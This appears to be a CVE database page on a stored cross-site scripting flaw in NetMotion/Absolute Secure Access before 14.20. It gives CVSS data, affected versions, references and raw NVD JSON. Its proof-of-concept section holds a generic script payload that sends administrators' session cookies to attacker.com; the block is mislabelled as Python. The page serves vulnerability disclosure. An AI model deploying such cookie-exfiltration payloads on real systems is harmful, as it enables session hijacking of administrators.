CVE-2026-0518

Description

CVE-2026-0518 is a cross-site scripting vulnerability in versions of Secure Access prior to 14.20. An attacker with administrative privileges can interfere with another administrator’s use of the console.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE

NetMotion Secure Access < 14.20

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-0518 PoC - Stored XSS in NetMotion Secure Access
// Note: Requires administrator privileges

// This PoC demonstrates the XSS vulnerability in the admin console
// The attacker injects malicious JavaScript that executes when another admin views the page

// Example malicious payload that could be injected:
var poc_payload = `
<script>
  // Steal session cookies
  document.location='https://attacker.com/steal?cookie='+document.cookie;
  // Or perform actions on behalf of the admin
  fetch('https://attacker.com/log?data='+btoa(document.cookie));
</script>
`;

// In practice, the attacker would inject this via:
// 1. Admin console settings/configuration fields
// 2. User management fields
// 3. Policy configuration areas
// 4. Any field that doesn't properly sanitize input

// When another administrator accesses the affected page,
// the script executes in their browser context

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0518
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0518
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0518/
[4] VulDB https://vuldb.com/cve/CVE-2026-0518
[5] https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0518", "sourceIdentifier": "[email protected]", "published": "2026-01-17T02:15:49.470", "lastModified": "2026-02-02T16:03:47.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2026-0518 is a cross-site scripting vulnerability in versions of \nSecure Access prior to 14.20. An attacker with administrative privileges\n can interfere with another administrator’s use of the console."}, {"lang": "es", "value": "CVE-2026-0518 es una vulnerabilidad de cross-site scripting en versiones de Secure Access anteriores a la 14.20. Un atacante con privilegios administrativos puede interferir con el uso de la consola por parte de otro administrador."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.20", "matchCriteriaId": "0037723E-6D5A-4D4C-91CC-7EB085C4CF61"}]}]}], "references": [{"url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}